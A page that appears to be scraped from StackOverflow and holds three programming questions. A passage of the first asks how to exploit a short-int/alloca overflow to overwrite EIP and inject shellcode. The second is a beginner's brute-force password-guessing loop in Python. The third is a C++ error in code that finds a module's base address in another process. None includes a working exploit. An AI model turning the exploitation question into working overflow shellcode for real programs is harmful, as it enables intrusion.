I think the vulnerability lies within the short int, and the use of alloca.

Entering ./app 65535 65535 can cause a segfault, but I can't actually overwrite anything since buffer will only ever be set to a max of 65535 or it wraps around. This makes me think I can't overwrite the EIP to inject shellcode.

Can anyone help me with where to look?

Thanks!


Source: (StackOverflow)

Python Password Program [closed]

I'm a beginner programmer and thought it would be cool to create a program to loop through "all" possible passwords. On a scale of 1-10, how efficient would you rate the following "hacking program?" Is there any way to make the following code more efficient? Any algorithms or tricks that you may know of?

I've considered moving 'e' and more common letters to the beginning of my character array since those letters are used more commonly.

import sys

password = raw_input("Enter a password: ")

characters = []
lower = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
upper = ["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
number = ["1","2","3","4","5","6","7","8","9","0"]
symbol = ["!","@","#","$","%","^","&","*","(",")","_","+","-","="]

#Creates array with most keyboard characters
for i in range(len(lower)):
    characters.append(lower[i])
for i in range(len(upper)):
    characters.append(upper[i])
for i in range(len(number)):
    characters.append(number[i])
for i in range(len(symbol)):
    characters.append(symbol[i])

found = False

#For 1 character passwords
for a in range(len(characters)):
    if (characters[a] == password):
        print (characters[a])
        found = True
if (found):
    sys.exit()

#For 2 character passwords
for a in range(len(characters)):
    for b in range(len(characters)):
        if (characters[a] + characters[b] == password):
            print (characters[a] + characters[b])
            found = True
if (found):
    sys.exit()

for a in range(len(characters)):
    for b in range(len(characters)):
        for c in range(len(characters)):
            if (characters[a] + characters[b] + characters[c] == password):
                print (characters[a] + characters[b] + characters[c])
                found = True
if (found):
    sys.exit()

for a in range(len(characters)):
    for b in range(len(characters)):
        for c in range(len(characters)):
            for d in range(len(characters)):
                if (characters[a] + characters[b] + characters[c] + characters[d] == password):
                    print (characters[a] + characters[b] + characters[c] + characters[d])
                    found = True
if (found):
    sys.exit()

for a in range(len(characters)):
    for b in range(len(characters)):
        for c in range(len(characters)):
            for d in range(len(characters)):
                for e in range(len(characters)):
                    if (characters[a] + characters[b] + characters[c] + characters[d] + characters[e] == password):
                        print (characters[a] + characters[b] + characters[c] + characters[d] + characters[e])
                        found = True
if (found):
    sys.exit()

Source: (StackOverflow)

Can you tell me what is wrong with this and how to fix it?

I have this code and I have been trying to make it work for hours.

DWORD GetModuleNamePointer(LPSTR LPSTRModuleName, DWORD __DwordProcessId)
{ 
    MODULEENTRY32 lpModuleEntry = {0};
    HANDLE hSnapShot = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, __DwordProcessId);
    if(!hSnapShot)
        return NULL;  
    lpModuleEntry.dwSize = sizeof(lpModuleEntry);
    BOOL __RunModule = Module32First( hSnapShot, &lpModuleEntry );
    while(__RunModule)
    {
        if(!strcmp(lpModuleEntry.szModule, LPSTRModuleName ) )
        {
            CloseHandle( hSnapShot );
            return (DWORD)lpModuleEntry.modBaseAddr;
        }
        __RunModule = Module32Next( hSnapShot, &lpModuleEntry );
    }
    CloseHandle( hSnapShot );
    return NULL;
}

I get an error when I try to compile it from this line.

return (DWORD)lpModuleEntry.modBaseAddr;

And this is the error.

[Error] invalid conversion from 'BYTE* {aka unsigned char*}' to 'DWORD {aka long unsigned int}' [-fpermissive]

What do I do to fix this? I honestly have no clue.


Source: (StackOverflow)